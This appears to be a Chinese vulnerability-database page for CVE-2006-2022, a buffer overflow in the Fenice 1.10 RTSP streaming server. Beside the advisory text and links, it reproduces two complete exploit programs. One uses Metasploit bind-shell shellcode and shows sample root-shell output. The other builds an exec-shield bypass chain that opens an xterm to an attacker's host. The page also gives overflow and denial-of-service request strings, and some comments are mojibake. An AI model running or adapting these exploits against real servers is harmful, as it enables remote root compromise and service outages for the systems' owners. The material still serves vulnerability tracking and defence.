CVE-2006-2022
CVSS7.5
发布时间 :2006-04-25 16:06:00
修订时间 :2011-03-07 21:34:48
NMCOES    

[原文]Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.


[CNNVD]Fenice远程溢出及拒绝服务漏洞(CNNVD-200604-493)

        Fenice是符合IETF标准的多媒体流服务器。
        Fenice的实现上存在缓冲区溢出漏洞,远程攻击者可能利用这些漏洞在服务器上执行任意指令或导致拒绝服务攻击。
        Fenice的RTSP模块使用parse_url函数解析URI中的服务器、端口和文件名。这个函数使用一些strcpy调用填充主函数所传送的服务器和file_name缓冲区,这就允许攻击者利用缓冲区溢出漏洞执行恶意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2022
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2022
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-493
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1491
(UNKNOWN)  VUPEN  ADV-2006-1491
http://www.securityfocus.com/bid/17678
(UNKNOWN)  BID  17678
http://www.securityfocus.com/archive/1/archive/1/431870/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060423 Buffer-overflow and crash in Fenice OMS 1.10
http://secunia.com/advisories/19770
(VENDOR_ADVISORY)  SECUNIA  19770
http://xforce.iss.net/xforce/xfdb/26078
(UNKNOWN)  XF  fenice-parseurl-bo(26078)
http://www.securityfocus.com/archive/1/archive/1/436256/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060607 Re: Buffer-overflow and crash in Fenice OMS 1.10
http://www.securityfocus.com/archive/1/archive/1/432002/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060425 Fenice - Open Media Streaming Server remote BOF exploit
http://securityreason.com/securityalert/794
(UNKNOWN)  SREASON  794
http://aluigi.altervista.org/adv/fenicex-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/fenicex-adv.txt

- 漏洞信息

Fenice远程溢出及拒绝服务漏洞
高危 缓冲区溢出
2006-04-25 00:00:00 2013-01-08 00:00:00
远程  
        Fenice是符合IETF标准的多媒体流服务器。
        Fenice的实现上存在缓冲区溢出漏洞,远程攻击者可能利用这些漏洞在服务器上执行任意指令或导致拒绝服务攻击。
        Fenice的RTSP模块使用parse_url函数解析URI中的服务器、端口和文件名。这个函数使用一些strcpy调用填充主函数所传送的服务器和file_name缓冲区,这就允许攻击者利用缓冲区溢出漏洞执行恶意指令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://streaming.polito.it/server

- 漏洞信息 (1717)

Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit (EDBID:1717)
linux remote
2006-04-25 Verified
0 c0d3r
N/A [点击下载]
/*
	IHS Iran Homeland Security public source code
	Fenice - Open Media Streaming Server remote BOF exploit
	author : c0d3r "kaveh razavi" c0d3r@ihsteam.com
	package : fenice-1.10.tar.gz and prolly prior versions
	workaround : update after patch release
	advisory : http://www.securityfocus.com/bid/17678
	company address : http://streaming.polito.it/server
	timeline :
	23 Apr 2006 : vulnerability reported by Luigi Auriemma
	25 Sep 2006 : IHS exploit released 
	exploit features :
	1) a global offset 
	2) reliable metasploit shellcode 
	3) autoconnect to shell
	bad chars  : 0x00 0x05 encoder : PexAlphaNum 
	compiled with gcc under Linux : gcc fenice.c -o fenice 

  **************************************************************
	 
	Exploitation Method : linux-gate.so.1
	 
	the refrence written by izik could be downloaded from milw0rm.
	after some research I realized that the offset is very stable
	around 2.6 kernels compiled from source. the VA patch will
	easily get bypassed. if you want to exploit 2.4 kernels 
	you can jump directly to the shellcode , there isn't any
	stack randomization for sure in 2.4.* by default.
	the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag
	(slackware 10.2), also on 2.6.15.4 compiled with i386 flag 
	(Fedora core 2) was same. on default installation of fc3 the
	linux-gate.so.1 has null at the first , so think of another 
	way to jump to the shellcode.

  **************************************************************

	greeting to :

	www.ihsteam.com       the team , LorD and NT 
	www.ihsteam.net       english version ,
	www.c0d3r.org         my home :)
	www.underground.ir    friends who are participating in the forums
	www.exploitdev.com    Jamie and Ben , those times are now legend
	www.milw0rm.com       str0ke , keep the good job going

/*
/*

[c0d3r]$ gcc fenice.c -o fenice
[c0d3r]$ ./fenice 127.0.0.1 554 0

-------- fenice - Open Media Streaming Project remote BOF exploit
-------- copyrighted by c0d3r of IHS 2006

[+] Targeting slackware 10.2
[+] Shellcode size : 329 bytes
[+] Building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 750 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully to 127.0.0.1
[+] trying to get shell
[+] connecting to 127.0.0.1 on port 4444
[+] target exploited successfully
[+] Dropping into shell

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux


*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#define inc 0x41
#define size 750


void gotshell(int new_sock);
void usage();

// metasploit.com shellcode - badchars = 0x00 0x05
// linux_ia32_bind -  LPORT=4444 Size=329 Encoder=PexAlphaNum
// I had a bit difficulty to execute my shellcode because some chars
// badly interpreted by fenice , anyway viva metasploit !

unsigned char shellcode[] =

"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff"
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56"
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58"
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44"
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d"
"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36"
"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49"
"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35"
"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45"
"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e"
"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e"
"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55"
"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b"
"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56"
"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55"
"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a";

char slack     [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 
char FC2_2_6_15[] = "\x77\xe7\xff\xff";	// Fedora core 2 , 2.6.15.4
char debug     [] = "\xdd\xdd\xdd\xdd";	// debugging purpose
char ret[4];
char get [] = "\x47\x45\x54\x20\x2f";
struct hostent *hp;
struct sockaddr_in con;
unsigned int rc,rc2,len=16,sock,sock2,os,addr,port;
char buffer[size];

// gotshell is from jamie (darkdud3) remote exploit sample 
// with a bit change

void gotshell(int sock){

	fd_set fd_read;
	char buff[1024];
	char cmd[100] = "id;uname -a\n";
	int n;

	FD_ZERO(&fd_read);
	FD_SET(sock, &fd_read);
	FD_SET(0, &fd_read);
	send(sock, cmd, strlen(cmd), 0);
	while(1) {
		FD_SET(sock,&fd_read);
		FD_SET(0,&fd_read);
		if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
		if( FD_ISSET(sock, &fd_read) ) {
			if((n=recv(sock,buff,sizeof(buff),0))<0){
			fprintf(stderr, "EOF\n");
			exit(2);
			}
			if(write(1,buff,n)<0)break;
		}
		if ( FD_ISSET(0, &fd_read) ) {
			if((n=read(0,buff,sizeof(buff)))<0){
				fprintf(stderr,"EOF\n");
				exit(2);
			}
			if(send(sock,buff,n,0)<0) break;
		}
		usleep(10);
	}
	fprintf(stderr,"Connection aborted, select failed()\n");
	exit(0);
}

void usage(char *arg){
	printf("-------- usage    : %s host_or_ip port target\n",arg);
	printf("-------- example  : %s localhost 554 0\n",arg);
	printf("-------- target 0 : slackware 10.2 linux-2.6.15.6     : 0\n");
	printf("-------- target 1 : Fedora core 2  linux-2.6.15.4     : 1\n");
	printf("-------- target 2 : debug			      : 2\n\n");
	exit(-1) ;
}

int main(int argc,char **argv){

	printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n");
	printf("-------- copyrighted by c0d3r of IHS 2006\n\n");
	if(argc != 4)
		usage(argv[0]);
	os = (unsigned short)atoi(argv[3]);
	switch(os){
		case 0:
		strcat(ret,slack);
		printf("[+] Targeting slackware 10.2\n");
		break;
		case 1:
		strcat(ret,FC2_2_6_15);
		printf("[+] Targeting fedora core 2 \n");
		break;
		case 2:
		strcat(ret,debug); 
		printf("[+] Debugging\n");
		break;
		default:
		printf("\n[-] This target doesnt exist in the list\n\n");

	exit(-1);
	}
	printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1);
	printf("[+] Building overflow string\n");

	// heart of exploit

	memset(buffer,inc,size);
	memcpy(buffer,get,5);
	memcpy(buffer+5+361,ret,4);
	memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);
	buffer[size] = 0;

	// EO heart of exploit

	hp = gethostbyname(argv[1]);
	if (!hp)
		addr = inet_addr(argv[1]);
	if ((!hp)  && (addr == INADDR_NONE) ){
		printf("[-] unable to resolve %s\n",argv[1]);
		exit(-1);
	}
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (!sock){ 
		printf("[-] socket() error...\n");
		exit(-1);
	}
	if (hp != NULL)
		memcpy(&(con.sin_addr),hp->h_addr,hp->h_length);
	else
		con.sin_addr.s_addr = addr;
	if (hp)
		con.sin_family = hp->h_addrtype;
	else
		con.sin_family = AF_INET;
	port=atoi(argv[2]);
	con.sin_port=htons(port);
	printf("[+] attacking host %s\n" , argv[1]) ;
	sleep(1);
	printf("[+] packet size = %d byte\n" , sizeof(buffer));
	rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
	if(!rc){
		sleep(1) ;
		printf("[+] connected\n") ;
		printf("[+] sending the overflow string\n") ;
		send(sock,buffer,strlen(buffer),0);
		send(sock,"\n",1,0);
		sleep(1) ;
		send(sock,"\n",1,0);
		sleep(1) ;
		printf("[+] exploit sent successfully to %s \n" , argv[1]);
		printf("[+] trying to get shell\n");
		printf("[+] connecting to %s on port 4444\n",argv[1]);
		sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		if (!sock){ 
			printf("[-] socket() error...\n");
			exit(-1);
		}
		con.sin_family = AF_INET;
		con.sin_port=htons(4444);
		rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
		if(rc2 != 0) {
		printf("[-] exploit probably failed\n");
		exit(-1);
		}
		if(!rc2){
			printf("[+] target exploited successfully\n");
			printf("[+] Dropping into shell\n\n");
			gotshell(sock);
		}
	}
}

// milw0rm.com [2006-04-25]
		

- 漏洞信息 (3815)

Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield) (EDBID:3815)
linux remote
2007-04-29 Verified
0 Xpl017Elz
N/A [点击下载]
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm plainning to publish it in English.
**
** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt
**
** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>


#define UNAME_PLT 0x8048e9c // <uname@plt> // randomÇÏ°Ô mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ

#define STRCPY_PLT 0x08048ffc // <strcpy@plt>
#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>:   pop    %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea)

#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò
/*
	(gdb) x/x 0x8059234
	0x8059234 <_GLOBAL_OFFSET_TABLE_+324>:  0x08049222
	(gdb) x 0x08049222
	0x8049222 <getgid@plt+6>:       0x00027068
	(gdb)
*/
#define GETGID_PLT	0x0804921c // <getgid@plt> // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵


#define EXECLE_16_0xff	0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000
#define EXECLE_08_0xff	0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00
#define EXECLE_00_0xff	0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!!


/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */
#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë


/* /usr/X11R6/bin/xterm */
#define ARG1_LOC	0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ)
#define SLASH_STR	0x8055acb // "/"
#define XTERM_STR_1	0x804875d // "us"
#define XTERM_STR_2	0x80585ce // "r/"
#define X_STR_1		0x8048df3 // "X"
#define R_STR		0x804a572 // "R"
#define XTERM_STR_3	0x804882c // "bin"
#define X_STR_2		0x8048e33 // "x"
#define XTERM_STR_4	0x8056a33 // "term"


/* -display */
#define ARG2_LOC	0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ)
#define DISPLAY_OPTION	0x80584b8 // "-di"


/* xhost_ip:0 */
#define ARG3_LOC	0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ)
#define NUM_0		0x8053285 // "0"
#define NUM_1		0x804ef17 // "1"
#define NUM_2		0x804b37b // "2"
#define NUM_3		0x804d622 // "3"
#define NUM_4		0x804e583 // "4"
#define NUM_5		0x80554d7 // "5"
#define NUM_6		0x8052341 // "6"
#define NUM_7		0x804d14a // "7"
#define NUM_8		0x8048db3 // "8"
#define NUM_9		0x80516bb // "9"


#define COLON_STR 0x8057abb // ":"
#define NULL_STR 0x805afbe // 0x00000000


int main(int argc,char *argv[]){
	int i=0,j=0;
	struct hostent *se;
	struct sockaddr_in saddr;
	unsigned long ip,ip1,ip2,ip3,ip4;
	unsigned char do_ex[4096];
	unsigned char xhost_ip[256];
	int sock;
	char host[256];
	int port=554;

	memset((char *)do_ex,0,sizeof(do_ex));
	ip=ip1=ip2=ip3=ip4;


	printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n"
		"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n"
		"** by Xpl017Elz\n**\n");
	if(argc<2){
		printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]);
		printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n");
		printf("** port: default 554\n");
		printf("** xhost ip: attacker xhost\n**\n");
		printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]);
		exit(-1);
	}
	else {
		sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
		ip=0;
		ip+=ip1 * (IP1);
		ip+=ip2 * (IP2);
		ip+=ip3 * (IP3);
		ip+=ip4;

		memset((char *)xhost_ip,0,256);
		sprintf(xhost_ip,"%10lu",ip);
	}

	memset((char *)host,0,sizeof(host));
	strncpy(host,argv[1],sizeof(host)-1);
	port=atoi(argv[2]);

	se=gethostbyname(host);
	if(se==NULL){
		printf("** gethostbyname() error\n**\n*/\n");
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		printf("** socket() error\n**\n*/\n");
		return -1;
	}

	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(port);
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);


	printf("** make exploit\n");
	sprintf(do_ex,"GET /");
	j=strlen(do_ex);
	for(i=0;i<320;i++,j++){
		sprintf(do_ex+j,"A");
	}

#define __GOGOSSING(dest,index,src){\
	*(long *)&dest[index]=src;\
	index+=4;\
}

	__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */
	// execle() ÁÖ¼Ò Á¶ÇÕ
	{
		i=0;
		/* (execle()>>0)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_00_0xff);
		/* (execle()>>8)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_08_0xff);
		/* (execle()>>16)&0xff */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,GETGID_GOT+i++);
		__GOGOSSING(do_ex,j,EXECLE_16_0xff);
	}
	// argv[0],argv[1]: /usr/X11R6/bin/xterm
	{
		i=0;
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_1);
		i+=2; /* "us" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_2);
		i+=2; /* "r/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,X_STR_1);
		i+=1; /* "X" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_1);
		i+=1; /* "1" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_1);
		i+=1; /* "1" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,R_STR);
		i+=1; /* "R" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_6);
		i+=1; /* "6" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_3);
		i+=3; /* "bin" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,SLASH_STR);
		i+=1; /* "/" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,X_STR_2);
		i+=1; /* "x" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,XTERM_STR_4);
		i+=4; /* "term" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// argv[2]: -display
	{
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,DISPLAY_OPTION);
		i+=3; /* "-di" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// argv[3]: xhost_ip:0
	for(ip=0;ip<10;ip++){
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);

		switch(xhost_ip[ip]){
			case '0':
				__GOGOSSING(do_ex,j,NUM_0);
				break;
			case '1':
				__GOGOSSING(do_ex,j,NUM_1);
				break;
			case '2':
				__GOGOSSING(do_ex,j,NUM_2);
				break;
			case '3':
				__GOGOSSING(do_ex,j,NUM_3);
				break;
			case '4':
				__GOGOSSING(do_ex,j,NUM_4);
				break;
			case '5':
				__GOGOSSING(do_ex,j,NUM_5);
				break;
			case '6':
				__GOGOSSING(do_ex,j,NUM_6);
				break;
			case '7':
				__GOGOSSING(do_ex,j,NUM_7);
				break;
			case '8':
				__GOGOSSING(do_ex,j,NUM_8);
				break;
			case '9':
				__GOGOSSING(do_ex,j,NUM_9);
				break;
		}
		i+=1;
	}
	{
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,COLON_STR);
		i+=1; /* ":" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NUM_0);
		i+=1; /* "0" */
		__GOGOSSING(do_ex,j,STRCPY_PLT);
		__GOGOSSING(do_ex,j,MOVE_ESP);
		__GOGOSSING(do_ex,j,DATA_LOC+i);
		__GOGOSSING(do_ex,j,NULL_STR);
		i+=1; /* null */
	}
	// exploit
	{
		__GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É.
		__GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇؼ­ ä¿ò.
		__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */
		__GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */
		__GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */
		__GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */
	}
	printf("** exploit size: %d\n",strlen(do_ex));

	i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(i==-1){
		printf("** connect() error\n**\n*/\n");
		return -1;
	}
	else {
		printf("** send exploit\n");
		send(sock,do_ex,j,0);

		printf("** sleepppppppp...\n");
		sleep(1);
		send(sock,"\n",1,0);
		send(sock,"\n",1,0);
	}
	close(sock);

	printf("** xhost, check it up, now!\n**\n*/\n");
	exit(0);
}

/* eoc */

// milw0rm.com [2007-04-29]
		

- 漏洞信息

24881
Fenice OMS Server HTTP RTSP Module parse_url Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in Fenice. Fenice fails to check a boundary error when parsing a RTSP URL resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.

- 时间线

2006-04-23 Unknow
2006-04-25 2006-06-06

- 解决方案

Upgrade to version 1.11 (svn r353 - 2006-06-06) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities
Unknown 17678
Yes No
2006-04-24 12:00:00 2007-04-30 10:00:00
Luigi Auriemma <aluigi@autistici.org> discovered these vulnerabilities.

- 受影响的程序版本

(LS)3 Fenice 1.10
(LS)3 Fenice 1.11

- 不受影响的程序版本

(LS)3 Fenice 1.11

- 漏洞讨论

Fenice is prone to multiple remote vulnerabilities:

- A buffer-overflow vulnerability. The application fails to perform sufficient bounds checking of user-supplied data before copying it to an insufficiently sized memory buffer. This issue potentially allows remote attackers to execute arbitrary machine code in the context of the affected server process. Failed exploit attempts will likely crash the application, denying service to legitimate users.

- A denial-of-service vulnerability due to an integer-overflow flaw. This issue allows remote attackers to crash the affected application, denying service to legitimate users.

Fenice 1.10 is vulnerable to these issues; other versions may also be affected.

- 漏洞利用

The following HTTP request is sufficient to demonstrate the buffer-overflow vulnerability:
GET /[approximately 320 'a's] HTTP/1.0

The following HTTP request is sufficient to demonstrate the denial-of-service vulnerabilty:
GET / HTTP/1.0
Content-Length: 4294967295

The following exploit code is available:

- 解决方案

The vendor has released version 1.11 to address this issue.


(LS)3 Fenice 1.10

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站